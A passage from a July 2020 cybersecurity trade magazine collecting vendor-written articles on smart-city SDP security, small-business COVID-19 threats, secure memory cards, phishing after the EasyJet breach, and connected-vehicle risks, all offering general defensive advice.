Tech Council member. Prior to Exabeam, Moore served as Staff

VP of Cybersecurity Analytics at Anthem, a Fortune 30

healthcare company. Moore’s experience includes leading the

investigation of state sponsored cyberespionage campaigns,

breach response, associated legal depositions, and client

management. He’s passionate about cybersecurity, teamwork and leadership excellence.

Cyber Defense eMagazineJuly 2020 Edition 59

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Software-Defined Perimeters Offer Secure Connectivity

to Smart Cities

By Don Boxley, CEO and Co-Founder, DH2i (www.dh2i.com)

Smart cities are on the rise—in a really big way. According to Microsoft, smart-city initiatives—which can

be defined as cities that rely on Internet of Things (IoT) sensors to obtain data that’s then mined to guide

management of city services and resources—account for nearly a quarter (23 percent) of the world’s IoT

projects.

As the number of smart cities mushrooms, these hyperconnected urban areas are becoming increasingly

critical to how seamlessly cities are able to operate. This is an important point to grasp, since cities serve

as the linchpin for most of the world’s data generation, as well as the majority of all energy consumption.

What’s more, most of us live in cities. The UN reports that just over half (55 percent) of the world’s

population makes a city their home—a figure that the UN predicts will rise significantly (close to 70

percent) in the next 30 years.

Here are some additional stats to impress upon you the importance of our urban areas in general, and

smart city growth in particular:

• Forbes reports that by 2025, we’ll be looking at approximately 80 billion devices that are smart

devices.

Cyber Defense eMagazineJuly 2020 Edition 60

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


• By then, our global cities may be cranking out up to 180 zettabytes of data.

• In terms of energy production, The World Bank reports that our urban meccas already gobble up

to 80 percent of its worldwide.

• Over the next decade, cities will likely be responsible for close to three-quarters (74 percent) of

global greenhouse gases, up from around two-thirds, or 67 percent, currently.

Adding Predictability with Smart Edge Devices

It can feel overwhelming to consider the vast scope of the challenges that face today’s cities. Cities are

charged with managing an ever-expanding laundry list of problems, including transportation, water and

energy, public health, infrastructure, public safety, waste reduction, and more. As the current global

pandemic and COVID-19 are showing, the high population and density of cities can quickly turn them

into a hotbed of issues that require the best that technology can offer to aid communication and mitigate

complexities.

To that end, studies have proven the value of edge computing and smart IoT edge devices, particularly

when it comes to smart cities. A comprehensive survey on “Edge Computing Enabled Smart Cities” by

Khan et al for the Institute of Electrical and Electronics Engineers (IEEE) stated that “it is evident from

literature that IoT is an integral part of smart cities. The next step is enabling the resource intensive and

strict latency IoT based smart city applications. Edge computing provides a promising way of enabling

these applications by offering computation and storage resources with low latency.”

However, metropolises still have a significant issue to figure out—security—when leveraging the power

of edge computing in smart cities. How can our global municipalities offer secure connectivity from their

datacenters (as well as from the cloud) to the edge? The answer lies in the secure environment provided

by software-defined perimeter (SDP) technology.

Safeguarding the Edge

SDP software provides the needed security for smart IoT edge devices by creating a “zero trust”

environment. This means edge devices don’t have full network access, but instead can only access the

exact applications that the city’s IT department has authorized them to see, whether in the cloud or

datacenter.

In other words, SDP allows for access at the application level only, not at the network level. As a result,

lateral attacks are no longer a thing, and smart cities can enjoy the “secure by default” architecture that

they require.

Here’s how SDP solutions work to help create secure, hyperconnected smart cities:

Cyber Defense eMagazineJuly 2020 Edition 61

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


• SDP software allows for data transfer, by way of encrypted micro-tunnels, right from smart IoT

edge devices to various destinations—whether an on-premises site, multi-cloud, or hybrid-cloud

setting.

• To ensure secure connectivity and transmission, SDP also uses public key authentication.

• Specific types of SDP software make this happen through an enhanced user datagram protocol

(UDP), which has randomly generated ports that render the tunnels basically invisible to

cybercrooks.

Other benefits for city IT staff include that SDP offers easy configuration and management, which aids

scalability. The software requires no appliances, and also avoids the various maintenance and security

challenges of VPNs, which were designed for a physical-server environment. SDP has performance

advantages as well, with the encrypted micro-tunnels offering the ability to be made highly available.

Smart devices and edge computing has proven ability to help smart cities advance and problem-solve—

but without secure connectivity, these measures fall short. By pairing an SDP client with smart devices,

those who are working on creating the hyperconnected smart cities that will take us into the future can

safeguard their investment of time, resources, and data as well.

About the author

Don Boxley Jr is a DH2i co-founder and CEO. Prior to DH2i, Don spent

more than 20 years in management positions for leading technology

companies, including Hewlett-Packard, CoCreate Software, Iomega,

TapeWorks Data Storage Systems and Colorado Memory Systems. Don

earned his MBA from the Johnson School of Management, Cornell

University.

Cyber Defense eMagazineJuly 2020 Edition 62

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Managing Small Business Cybersecurity During Covid-19

By Bill DeLisi, CEO of GOFBA

Small businesses are undertaking extraordinary changes during the coronavirus epidemic. They’re

laying off staff, shifting their business models, and managing the challenges of remote work. The pace

of the stay-at-home orders and the abrupt halt of the economy required small businesses to move

quickly. States are in the midst of gradually reopening, but many smaller firms will continue to face

impactful challenges for the rest of the year and beyond. In addition to the safety and health issue

concerns, small firms are also facing cybersecurity risks.

Compared to enterprise-level firms, small businesses do not possess massive IT budgets to confront

threats. Large firms have capital to weather business interruptions that might come from data breaches.

Small businesses are already devastated during COVID-19, they can’t risk losing data and being offline

for even a day. And there’s the PR hit that comes with a data breach event. A small firm cannot likely

survive a breach, especially in the current economy where competition for dollars is at a premium.

Unfortunately, there’s many bad actors out there. Cybersecurity hacking attempts are rising during the

COVID-19 pandemic, as hackers prey on fear and uncertainty. To that end, here are three of the most

persistent and damaging COVID-19 driven security threats for small business, along with some tips for

mitigating the risks.

1. Stop Malware in its Tracks

Malware encompasses spyware, viruses, trojans, and other tools hackers use to infect computers. The

actual programs live on attachments and within software such as PDF viewers. Staff members must avoid

downloading unapproved programs and understand the types of actions that can lead to malware.

Cyber Defense eMagazineJuly 2020 Edition 63

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


The COVID-19 outbreak offers opportunity for hackers. For example, there’s malware embedded in some

live maps of the virus’ spread. COVID-19 themed malware that wipes a computer clean is also circulating.

Firewalls and anti-malware programs are a first line of defense for small businesses. These programs

must use automatic updating for maximum protection so they can detect the latest threats.

Workers now operating from home are exposing their company’s data and networks. They’re using home

Wi-Fi, and many are searching on non-approved or dangerous websites. Restricting search for remote

workers is tricky but is possible through a secure search engine such as GOFBA. This platform limits

malware by stopping users from reaching suspicious sites, while still allowing them to access information

that pertains to their jobs. Small business staff should also limit their information gathering about the

COVID-19 epidemic to established news and health organization sites. Unknown sites filled with

information about pandemic “cures” or various conspiracy theories and other content are likely filled with

malware.

2. Prevent Phishing

Phishing schemes are simple. A hacker creates a formal-looking email and sends it out to a large group

of recipients. Their goal is for someone to open the email and either click a link or download an

attachment. That simple action then launches malware which infects the person’s computer and the

linked company network. The hacker then controls the firm’s data, encrypts it, and holds it for ransom.

The pandemic provides ample material for phishing schemes. Emails touting fake COVID-19 tests or

miracle cures prey on people’s fear about the virus. Other emails pushing for donations to charities prey

on people’s willingness to help, while directing money to fraudulent accounts. Many phishing emails

mimic communications from local government agencies or the CDC, with official-sounding messages

about pandemic news or recommended actions.

Small businesses workers must read about the dangers of such emails, and how to recognize fake and

dangerous communications. The typical phishing email gives itself away with some clues:

• Amateurish design with outdated graphics and feel

• Unprofessional-sounding content with misspellings

• Odd URLs that do not match the company/organization (users can hover their mouse on links to

see the destination address)

• The email asks the recipient to confirm personal information, such as “Enter your SSN to see if

you qualify for free COVID-19 testing”

• Messages that play on panic and suggest urgent action are very often phishing schemes

Remote employees need a better understanding about phishing emails and should err on the side of

caution before clicking any links or attachments. Remind the employees that deleting the email is the

safest move.

3. Properly Manage BYOD

With a massive move towards remote work comes the need for laptops and phones to connect to work.

Some firms provide employees with devices. Others use a BYOD, or “Bring Your Own Device” policy that

allows employees to utilize their personal device to access work software.

Cyber Defense eMagazineJuly 2020 Edition 64

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


There are multiple risks when employees use their own devices for work. Since they’re at home and

comfortable with their phone and laptop, many users will engage in riskier searches and look at sites

they’d never consider at the workplace. These sites increase exposure to malware, which then puts the

connected company networks at risk.

Small businesses must take the time to implement personal device policies. This includes detailing how

employees are accessing and storing company data. For example, are staff saving information to their

laptops? Are they using unsecured cloud storage through Google or Dropbox instead of the corporate

cloud? Do employees use strong two-factor passwords? What happens with data access when a remote

worker leaves a company? A formal plan is essential for protecting both the company and the employees.

Companies must strike a balance during this work-from-home period. They need to protect their data

through rules and processes while also giving staff enough flexibility to access needed information. There

are also privacy considerations in play. Small business owners must understand the employee’s family

members are also using the home Wi-Fi, so there’s only so much control the owners can exert. A solid

approach for remote workers is to create formal guidelines to include mobile device management

software that automates updates, features virus detection, and gives employees limited control. The key

is transparency. Both the employee and employer are on the same page regarding expectations and

rules. And as the pandemic eases in some areas, business owners must decide if workers can remain at

home, need to come back to offices, or if they will adopt a hybrid approach.

Key Takeaway

During the pandemic, small business owners are pivoting while trying to retain good employees.

Cybersecurity threats are an additional unneeded stressor for already strained companies. Thankfully,

by following guidelines for remote workers and managing risks, firms can reduce the chances of a

cybersecurity event and focus on making it through the crisis.

About the Author

Bill DeLisi is one of the world’s most authoritative experts on

cybersecurity. He is currently the Chief Executive Officer, Chief

Technology Officer and a founding member of the Board of

Directors for GOFBA, Inc. DeLisi has more than 30 years of

experience in the computer industry, including holding the position

of Chief Technology Officer at several companies. He has worked

closely with Microsoft Gold Certified Partners, helping pioneer

“cloud” computing and creating security infrastructures that are still

in use today. DeLisi is responsible for the development of

proprietary technology that serves as the backbone of GOFBA’s

platform and has over 30 certifications with Microsoft, Cisco, Apple,

and others, which includes the coveted Systems Engineer with

Advanced Security certification, as well as expert status in Cloud

Design and Implementation.

Bill Delisi, CEO of GOFBA. Bill can be reached via email at bill@gofba.com or on his company website

www.GOFBA.com.

Cyber Defense eMagazineJuly 2020 Edition 65

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


IOT Security Embedded in Memory Cards

AS DEVICES, MACHINERY AND MANUFACTURING PLANTS GET SMARTER, THEY ALSO

BECOME MORE VULNERABLE.

By Hubertus Grobbel, Vice President Security Solutions, Swissbit.

When designing networked devices, machinery and production facilities, developers need to place more

focus on security aspects. Swissbit now offers a flexible, hardware-based approach that includes TPM

(Trusted Platform Module) and data encryption.

For IT- and data-security, systems communicating over the Internet or via their gateways in the IoT

(Internet of Things), need to have a unique and non-cloneable identity. Systems must also be able to

send, receive and store cryptographically and heavily secured data. Solutions involving only the use of

software rarely offer sufficient protection. This presents developers and manufacturers with great

challenges.

Swissbit, the storage and security expert, offers a new hardware-based approach. Developers of

embedded systems for industrial applications know Swissbit as the only independent European

manufacturer of flash memory products. Many see the Swiss company, manufacturing in Germany, as

their top choice for robust, durable SSDs with PCIs and SATA-interfaces, CompactFlash, USB-flash

drives, SD and microSD memory cards and managed NAND BGAs.

Based on decades of experience in the protection of stored data, Swissbit has now developed a new

advanced approach to security for embedded IoT devices. The thought process behind the development

is that every device needs memory to act as a boot medium for log files, and data cache memory in case

of network failures. These memory interfaces can and should have security features.

Cyber Defense eMagazineJuly 2020 Edition 66

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Security in memory card format

Swissbit’s new security solution consists of a flash memory chip, produced and tested for industrial

requirements. This chip is run using a special version of the durabit firmware with integrated AES 256-bit

encryptor (Fig. 1). The DP (Data Protection) version encrypts and protects all data in various ways (CD-

ROM mode, PIN protection, hidden memory, WORM mode). For the hardware-based protection of the

communication in the IoT, another security anchor is required. Swissbit’s security modules come with

solutions such as an Infineon/NXP Smart Card Chip CC EAL 5+/6+. An API, a SDK and a PKCS#11

library are available for application development.

Fig 1. The structure of a microSD card with security features.

Designating an ID to things

Security experts trust in microSD cards with secure element for encrypting mobile phone

communications. Similar to the communication between people, the communication of the things across

the Internet also needs to employ identification, authentication and authorization. In other words, how

does a “thing” know that the data or data queries received from another “thing” are correct and that the

source of a message is truly the system component that it claims to be? Swissbit security memory media,

with secure element, provide applications and systems with a unique identity. “Things” get a counterfeitproof

ID and as such, networked systems can be protected from misuse, “identity theft” and data access

can be restricted. Smart cards, that are integrated onto memory cards, provide systems with noncloneable

identities, transforming them into uniquely identifiable M2M (machine-to-machine)

communication participants, that can authenticate themselves and send and receive cryptographically

heavily secured data.

Another important device-specific application for these Swissbit solutions is Trusted Boot. Trusted Boot

ensures that software can only be run on specific hardware or hardware classes. A secure flash memory

Cyber Defense eMagazineJuly 2020 Edition 67

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


card can be used to manage software licensing and feature activation. Access control, code encryption

or digital signature allow the definition and management of different software configurations for products.

Retrofittable and future-proof

In comparison to a soldered TPM, the idea of a pluggable security module might at first seem unusual.

However, older machinery and systems generally have a USB interface or interfaces for memory cards

(Fig. 2). Therefore, the big advantage of using pluggable security modules is that existing devices can

easily be retrofitted and secured using Swissbit security memory.

This ability to retrofit devices offers another advantage in the constant race to keep up with cyber security.

Attack and defense methods develop cyclically and harmonizing them with for example the project

lifecycle of an industrial plant is challenging. A situation could arise where it necessary to allocate a new

ID with improved cryptography technologies to the M2M communication participants. Swissbit’s

retrofittable solution makes this possible.

Fig 2. Memory interfaces, such as USB, can be used to retrofit a TPM function.

Outlook

In response to the rapidly increasing market demand for embedded IoT, Swissbit opened its new factory

in October 2019, located in Berlin, Germany. This factory is equipped with state-of-the-art advanced 3D

chip scale packaging technology, developing and producing customized system-in-package and multichip

module designs for its customers. This technology facilitates not only the integration of

microcontrollers, NAND chips and crypto chips, but also sensors, wireless chips and antennas. Using

memory interfaces with TPM and encryption components for security solutions might only be the

beginning, with the scope for the addition of further functionalities that can be miniaturized and integrated.

Cyber Defense eMagazineJuly 2020 Edition 68

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


About the Author

Hubertus Grobbel is the Vice President Security Solutions,

at Swissbit

Hubertus can be reached online at [email]

and at our company website https://swissbit.com/en/

Cyber Defense eMagazineJuly 2020 Edition 69

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


How To Fight A Virus: Lessons From Cybersecurity

By Yotam Gutman, SentinelOne

There has been a great deal of conversation around the similarities between the spread of the Covid-19

virus and that of computer viruses. And indeed, as the first global pandemic to occur during the age of

connectivity, this comparison is valid. But while most focus on how we can leverage the knowledge gained

in the “real world” in identifying and stopping the spread of plagues in the virtual world, I would like to

offer another perspective.

Perhaps we in cybersecurity can return the favor. Perhaps the medical world can take the lessons learned

in three decades of fighting “cyber viruses” and implement these in their fight to mitigate the Coronavirus?

History

Originally, the type of computer software described as “a program that can infect other programs by

modifying them to include a, possibly evolved, version of itself” was named “Virus” by Fred Cohen in his

1986 Ph.D. thesis. Another biological reference made its way into the computer lingo when the first worm

was unleashed (although the phrase was used in an earlier sci-fi novel).

In the last couple of years, computer viruses, or more widely the panoply of malware as we think of

cybersecurity today, have undergone rapid evolution that has made them much more difficult to identify

and mitigate:

Cyber Defense eMagazineJuly 2020 Edition 70

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


More variants: 439,000 new malware variants were detected in 2019. That’s a 12.3% increase over the

previous year.

More capable: Modern malware threats are far more capable than the old viruses spreading through

illegal copies of software distributed via floppy-disks. Today’s malware can steal passwords, exfiltrate

sensitive data, encrypt and delete data, and much more.

Harder to detect: Malware authors work hard to make their software difficult to detect. This includes hiding

it in legitimate documents (aka “weaponizing” Word, PDF and Excel documents), utilizing detectionevasion

mechanisms (like avoiding execution in sandboxed environments), and using legitimate software

update mechanisms, all to make the work of the defenders harder.

More aggressive: Some malware types are extremely aggressive; they scan for open RDP ports, bruteforce

their way onto a device, and then move laterally within the organization’s network, abusing

password-protected servers and seeking sensitive data, all without the knowledge of the victim.

Fast: contemporary malware is extremely fast and works at machine-speed to bypass protection

mechanisms and achieve its goals—ransomware like “WannaCry” disabled entire organizations in

minutes.

Adopting Cybersecurity Response to Fight Covid-19

To mitigate today’s plethora of rapidly evolving cyber threats, the cybersecurity industry has developed

several methodologies. These (after adaptation) could be used to reduce the spread of malicious

software and to mitigate its effects. I will refrain from discussing the obvious virus/Anti-virus analogy.

Obviously, a vaccine for a computer “virus” would be the answer, but estimates suggest that such a

vaccine would not be available in the next 12-18 months, and there’s a lot we can do until then:

Zero trust policy- A methodology that defies the traditional security assumption that everything inside the

perimeter (protected by the firewall) is trusted. The main principle of Zero Trus is “never trust, always

verify”. This means that every user is asked to verify their credentials every time they wish to “enter” the

organization and that every file and process are being constantly monitored – even if they have been

“authorized” to run on the computer.

In a similar manner, humans should consider that other humans are carriers, and only “trust” them after

they have been tested negative (or at the minimum, have had their temperature taken).

Detection beats prevention: following a similar line of thought, most organizations today operate under

the “Assume a Breach” paradigm. Instead of striving to identify and mitigate 100% of threats 100% of the

time, they assume that some threats would be able to infect them and concentrate their efforts on quickly

finding these and stopping them before they could do more harm.

Similarly, it is prudent to assume that humanity would not be able to vanquish this virus, and we will be

playing “whack-a-mole” with it for the foreseeable time. Given that this is the case, it’s prudent to invest

in rapid detection of the infection (quick detection kits, even home detection kits), ensure those that are

sick are given quick treatment, and continue to monitor the entire population for outbreaks.

Cyber Defense eMagazineJuly 2020 Edition 71

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Segmentation; an important principle that limits the “movement” within the organization, so that intruders

cannot move freely and infect other parts of the organization.

The real-life manifestation would be to identify infection “hot-spots”, lock these down and then tend to

these infected rather than to lock-down entire countries.

Risk modeling: it might be possible, perhaps, to provide 100% security, 100% of the time, but the cost to

the organization would be detrimental; either the security costs would be through the roof, or the security

restrictions imposed to maintain 100% security would cause the business to stand still. Instead, a CISO

conducts risk assessments and prioritizes security spending to mitigate the most acute threats and

secure the most valuable assets.

Healthcare officials should do the same and ensure that the most sensitive segments of the population

(elderly, sick) are being shielded from the disease and if need be, are provided with better care.

Intelligence intake: fighting a stealthy enemy is hard because you don’t know what to expect. Security

professionals, governments, and those in the security industry have been formally and informally sharing

information about malware, cybercrime groups, and data leaks for a long time. This has proved to be

immensely helpful in fighting and defeating cybercrime rings.

Such collaboration should also be adopted by global scientific, medical communities, governments, and

healthcare organizations. As this threat is new to humanity, we should all share information about

detection and treatment mechanisms and notify others when we think we’ve made breakthroughs in

finding a cure or a vaccine.

Conclusion

We can debate the similarities between biological and computer “Virus” (which, some believe, more

resembles a Bacteria than a virus), but the analogy is, for the most part, correct. Viruses are dangerous

to the victims, and they spread quickly through the population until a cure, or a vaccine is found. The

spread of the Coronavirus pandemic and its impact on our lives is nothing like the world has seen before.

It spread almost at machine speed and overwhelmed countries and healthcare organizations. We believe

that utilizing the lessons learned by the cybersecurity industry in the past 3 decades could help to thwart

the Coronavirus pandemic.

Cyber Defense eMagazineJuly 2020 Edition 72

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


About the Author

Lt. Commander (Ret.) Israel Navy, Yotam Gutman, has

filled several operational, technical, and business positions

at defense, HLS, Intelligence, and cybersecurity

companies, and provided consulting services for numerous

others. Yotam joined SentinelOne 6 months ago to oversee

local marketing activities in Israel and contribute to the

global content marketing team. Yotam founded and

managed the Cybersecurity Marketing Professionals

Community, which includes over 300 marketing professionals from more than 170 cyber companies.

Yotam was chosen as one of the 5 Security Influencers to Follow on LinkedIn.

Cyber Defense eMagazineJuly 2020 Edition 73

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


How to Combat Cybersecurity Attacks & Cyber Warfare

By Adnan Olia, Chief Operating Officer and Co-owner of Intradyn

It’s no secret that cybersecurity attacks and cyber warfare are real challenges and threats to the safety

of individuals, businesses, organizations — and especially the government. Personal and professional

data, including passwords, credit card and bank account information, and Social Security numbers can

be vulnerable. Plus, it can take months — even years — to recover from cyberattacks and cases of

identity theft. According to CNBC, cyberattacks cost businesses of all sizes an average of $200,000, and

“60% go out of business within six months of being victimized.”

A professor of business technology predicted in a recent Forbes article that cyberattacks will be more

prevalent in 2020 “because it’s the cheapest, easiest, fastest, and most effective form of warfare we’ve

ever seen, and because cyberwarfare defenses are more vulnerable than they’ve ever been.”

But what is cyber warfare, exactly? The RAND Corporation defines the term as “the actions by a nationstate

or international organization to attack and attempt to damage another nation’s computers or

information networks through, for example, computer viruses or denial-of-service attacks.”

There are many types of attacks and warfare, including phishing, ransomware, and mobile- and cloudbased

attacks. We’ll outline some of the most common and offer solutions to help you take the necessary

precautions and steps toward securing your data and private information.

Cyber Defense eMagazineJuly 2020 Edition 74

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


What Are the Different Types of Threats?

Phishing

The U.S. Securities and Exchange Commission defines phishing as “the use of fraudulent emails and

copy-cat websites to trick you into revealing valuable personal information — such as account numbers

for banking, securities, mortgage, or credit accounts, your Social Security numbers, and the login IDs

and passwords you use when accessing online financial services providers.”

The goal, of course, is to use your personal information to steal your money and/or your identity. Phishing

also targets short message service (text messages) — and there’s also the possibility of “spearfishing by

video,” which allows hackers to “leverage new tools such as ‘deep fake’ technology to look and sound

like a trusted person (e.g., a Facetime with an attacker posing as a CEO).”

An article about 2020 cybersecurity predictions from SC Media predicts that “company microtargeting

with industry-specific tools will rise.” It’s more important than ever that organizations have the proper

controls in place to educate their employees and detect these kinds of threats.

Ransomware

The Department of Homeland Security defines ransomware as “a type of malicious software, or malware,

designed to deny access to a computer system or data until a ransom is paid. Ransomware typically

spreads through phishing emails or by unknowingly visiting an infected website.”

According to a recent Forbes article, business ransomware attacks were on the rise in the first quarter of

2019, and the trend is expected to continue in 2020 because “as the FBI softens its stance on businesses

paying ransoms, the number of ‘successful’ ransomware attacks (i.e. those in which the ransom is paid)

will double, with total losses of all reported attacks increasing significantly.”

Mobile Attacks

The Pew Research Center estimates that more than 5 billion people around the globe have mobile

devices (over half of which are smartphones), and according to HubSpot, 52% of web traffic around the

world is mobile.

With so much widespread cell phone ownership and use, it’s no wonder that hackers are threatening

mobile devices. According to Lookout, “traditional secure email gateways block potential phishing emails

and malicious URLs, which works for protecting corporate email from account takeover attacks, but

neglects mobile attack vectors, including personal email, social networking, and other mobile centric

messaging platforms such as secure messaging apps and SMS/MMS.”

It’s also worth noting that with every new piece of technology (such as the latest smartphone model)

comes security challenges. For example, the debut of 5G means new problems with malware aiming to

take advantage of the security features, according to AVG.

Cyber Defense eMagazineJuly 2020 Edition 75

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cloud-Based Attacks

According to Threatpost, “as more corporate infrastructure moves to the cloud, so will the focus of

criminals.” This means that while conducting an attack will be more of a challenge, attacks may become

more sophisticated and more common.

Businesses and organizations are also more confident when it comes to the cloud. But confidence doesn’t

always translate to tighter security measures. According to Forbes, “60% of organizations don’t

understand the shared responsibility model when it comes to who secures workloads in the cloud. This

will create a false sense of security in cloud security providers by their customers, as the latter are

responsible for securing privileged access to their cloud administration accounts and workloads.”

Artificial Intelligence and Voice Phishing

As technology becomes more advanced, so do the types of cyberattacks. For example, “deepfake

technology” can be used to exploit people in scams. According to MSNBC, the term deepfake refers to

instances where creators have produced digital content by manipulating images, voices, images — and

even create fake videos that look real. In one instance, according to Forbes, a CEO gave up $243,000

due to a deepfake scam.

An article about 2020 cybersecurity predictions in SC Magazine asserts that “voice phishing will become

the new phishing bait.” In other words, it’s now easier than ever for scammers to sound like someone

else. High-level people such as executives and politicians are expected to face heightened risk with

advanced deepfake technology. Those scammers can then leave voicemails (or speak directly with

callers) asking for donations or for personal information.

How to Protect Yourself: Solutions & Tips

There are many ways to protect yourself — and your business or organization — from cyberattacks and

cyberwarfare. The Department of Homeland Security (DHS) is a good place to start and provides the

following tips:

• Maintain up-to-date software and operating systems

• Ensure that your passwords are strong

• Remain vigilant and watch out for suspicious activity

• Do not click on links or open emails if you’re unsure

• Do not provide personal information

• Use secure internet connections

• Back up your folders and files

• Protect your home and/or business network

Protecting your email is especially important. Investing in a good email archiving solution can also help

you mitigate a potential attack by offering backup and disaster recovery options.

It’s also important to be aware of the types of email messages you’re receiving. Poor spelling and

grammar, mismatched URLs, messages asking for personal information, and notes where you didn’t

initiate the action are just some examples of signs of a possible phishing attack.

Cyber Defense eMagazineJuly 2020 Edition 76

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Even though DHS recommends using two methods of verification, many other resources recommend

multi-factor authentication. This means that a computer (or mobile device) will only grant you access after

you present at least two pieces of “evidence” that only you would know or have access to.

“Evidence” includes information such as passwords and PIN numbers or physical characteristics such as

(fingerprint, voice recognition, etc.) The authentication could also be a physical item, such as a security

token.

Many organizations are also adopting Disaster Recovery-as-a-Service (DRaaS), which is “defined as

providing a remotely hosted disaster recovery service to protect a business’s data and applications,”

according to Carbonite.

With the sheer volume and variety of cyberattacks and warfare targeting individuals and organizations,

it’s more important than ever to take the appropriate precautions to ensure that personal information and

data remains secure and safe.

About the Author

Adnan Olia, Chief Operating Officer and Co-owner of Intradyn

Cyber Defense eMagazineJuly 2020 Edition 77

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


COVID-19 And the Easyjet Hack - A Perfect Phishing

Storm

By Shachar Daniel, Safe-T’s CEO

As if the airline industry didn’t have enough to worry about at the moment, on May 19, EasyJet, the UK’s

biggest budget airline announced it had been breached. Exposed in the attack were the email addresses

and travel information for 9 million customers. A small group of customers also had their credit card

details, including the CVV, exposed in the attack which lasted from October 2019-March 2020.

Although EasyJet first learned about the attack in January, they only began informing those customers

whose credit card information was exposed in April. The airline said they did not disclose the attack earlier

due to the complexity involved in piecing together which systems and which individuals had been

affected. According to the UK's Information Commissioner's Office, “This was a highly sophisticated

attacker. It took time to understand the scope of the attack and to identify who had been impacted."

Bad Timing - COVID-19 and Airline Scams

The EasyJet hack just happens to come at a spectacularly rotten time, as airlines around the world,

EasyJet included, are dealing with severe losses due to COVID-19. According to Dr Jason Nurse of the

Kent Interdisciplinary Research Center, “It is clearly a difficult time for the travel industry considering the

impact of COVID-19 on operations. A cyber-attack is the last thing an airline would want to deal with

now.”

Cyber Defense eMagazineJuly 2020 Edition 78

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


To make matters even more complicated, authorities have warned customers to be on the lookout for

phishing emails offering refunds on flights, now that their personal details may be up for grabs on the

darkweb. According to privacy expert Ray Walsh, "Anybody who has ever purchased an EasyJet flight is

advised to be extremely wary when opening emails from now on...Phishing emails that leverage data

stolen during the attack could be used as an attack vector at any point in the future.”

In fact, a recent statement from EasyJet compelled customers to think critically when opening EasyJet

emails, saying "We are advising customers to be cautious of any communications purporting to come

from EasyJet or EasyJet Holidays."

But EasyJet was not the only airline to have phishing campaigns associated with it over the course of the

pandemic. As the impact of COVID-19 began to take hold in late March and airlines started canceling

flights, Emirates Airlines warned customers about circulating fake flight refund emails and email security

provider Mimecast alerted authorities to a major uptick in flight-related email scams involving a variety of

airlines. Other security firms noted a rise in voice-based flight cancellation scams, wherein scammers,

posing as airline agents, called random people to discuss purported flight cancellations, and in the

process, tried extracting personal information.

And now, as airlines across the world attempt to cut their losses, they are offering heavy discounts on

flights, for whenever regular flights do resume. As inboxes fill up with enticing promotions offering deals

on future flights, customers should remember that while many of these emails are legitimate, a significant

portion are phishing emails, cashing in on the confusion created in COVID-19.

How to Spot a Travel-Based Phishing Email

Meanwhile, it’s important to note that since travel information was included in the stolen EasyJet data

set, phishing emails sent to those customers may be highly targeted and include real elements, like dates

and destinations, making the emails seem legitimate. If your data was exposed in the EasyJet hack, there

are some relatively simple ways to protect yourself from falling prey to the ensuing phishing threats.

What’s more, these tips can be just as easily applied to any trending COVID-19 airline email scams out

there today. So when you get flight promotions or cancellation notices, be sure to:

- Look at the sender's email address - does it match the name of the airline or is it slightly off? For

example, if it says EasyJetTravel.com, JetBlueFlights.com, or SouthWestTickets.com, you can

rest assured it’s a scam.

-

- Avoid any email requesting personal information, such as credit card information, dates of birth,

or social security numbers.

-

- Delete messages that include links or attachments, which are often filled with malware payloads.

Cyber Defense eMagazineJuly 2020 Edition 79

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


- Think twice when it comes to promotions requiring the reader to take action NOW! Scammers try

to get their targets to act impulsively, before critical thinking can get in the way. If there’s no time

to make a thought-out decision, that's a bad sign.

COVID-19 is waning and the world is starting to open up again. This is great news for consumers as well

as the airline industry—but as always, remember that scammers love to capitalize on fluctuating

circumstances—so proceed with caution before booking any deals.

About the Author

Shachar Daniel is the CEO at Safe-T and one of its cofounders.

In his role, he is responsible for the overall vision,

company strategy, day-to-day operations, and for growing

Safe-T’s business and presence around the world. Shachar

brings to Safe-T more than 14 years of experience in various

managerial and business roles. Prior to founding Safe-T, he

was program manager at Prime-sense, head of operations for project managers at Logic and project

manager at Elbit Systems. He is an experienced manager with a passion and high commitment for project

delivery. Shachar holds an Executive MBA from The Hebrew University, an MBA from The College of

Management Academic Studies in Israel and a B.Sc. in Industrial Engineering from The Holon Institute

Technology.

Cyber Defense eMagazineJuly 2020 Edition 80

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Should We Be Worried About Vehicle Hacking?

And what can we do about it?

By Martin Banks

With more connected devices than ever, cybersecurity is a more prominent issue today than ever before.

You'll see articles and discussions about security for computers, smartphones and wearables, but these

may not cover everything. As more vehicles are including internet-based functions, should we be worried

about vehicle hacking?

Ten years ago, this question would seem like nothing but science fiction. Now that we're on the cusp of

the driverless vehicle revolution, though, it may require some attention. Here's a closer look at connected

cars and whether they present a cybersecurity risk.

The Rise of the Connected Car

To understand the gravity that vehicle hacking may present, you first have to know how prevalent

connected vehicles are. When you look at the data, you realize these technologies may be more

widespread than you thought. There were more than 50 million shipments of connected cars in 2019, up

45% from the year prior.

Cyber Defense eMagazineJuly 2020 Edition 81

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


With an adoption rate like that, it won't be long before connected cars cover the roads. Not everyone

needs to drive an internet-enabled vehicle for them to impact everyone, either. Any hacked automobile

endangers nearby drivers and passengers, so even with a low penetration rate, they could be risky.

Cars aren't the only connected vehicles out there, either. Other modes of transportation, like ships, are

also becoming increasingly connected.

How Are Vehicles Vulnerable?

It's evident, then, that there are enough connected vehicles for hacking to be a concern. The number of

potential targets isn't the only factor at play, though. You also have to consider what makes these cars

